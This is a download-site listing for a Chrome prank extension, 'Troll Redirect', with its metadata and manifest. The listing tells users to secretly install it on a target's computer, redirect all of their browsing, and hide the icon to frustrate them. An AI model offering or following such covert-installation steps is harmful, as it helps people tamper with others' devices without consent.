Troll Redirect

Redirect all of your friend's webpages automatically by installing this on their computer!

What is Troll Redirect?

Troll Redirect is a Chrome extension developed by Aaron Lockhart, and its main feature is "Redirect all of your friend's webpages automatically by installing this on their computer!".

Extension Screenshots

screenshot

Download Troll Redirect Extension CRX File

Download Troll Redirect extension files in crx format, manually install Chrome extensions in the browser, or share the crx files with friends to easily install Chrome extensions.

Extension Usage Instructions

                        Troll and prank your friends with this automatically redirecting app! Upon installing it on your target's computer, click the icon and specify the website to which all requests will be redirected. This is guaranteed to frustrate and annoy your target immensely. Then hide the icon in the chrome menu and sit back while your target gets increasingly angry.                    

Extension Basic Information

Name Troll Redirect Troll Redirect
ID micldaecbnddhhcaojamonojfdffegph
Official URL https://chrome.google.com/webstore/detail/troll-redirect/micldaecbnddhhcaojamonojfdffegph
Description Redirect all of your friend's webpages automatically by installing this on their computer!
File Size 949 KB
Installation Count 192
Current Version 1.0
Last Updated 2018-12-06
Publish Date 2018-12-02
Rating 4.75/5 Total 4 Ratings
Developer Aaron Lockhart
Email [email protected]
Payment Type free
Supported Languages en
manifest.json
{
    "update_url": "https:\/\/clients2.google.com\/service\/update2\/crx",
    "name": "Troll Redirect",
    "version": "1.0",
    "description": "Redirect all of your friend's webpages automatically by installing this on their computer!",
    "manifest_version": 2,
    "author": "Aaron Lockhart",
    "permissions": [
        "tabs",
        "storage"
    ],
    "content_scripts": [
        {
            "matches": [
                "*:\/\/*\/*"
            ],
            "js": [
                "\/src\/troll.js"
            ],
            "run_at": "document_end"
        }
    ],
    "browser_action": {
        "default_popup": "\/src\/popup.html"
    }
}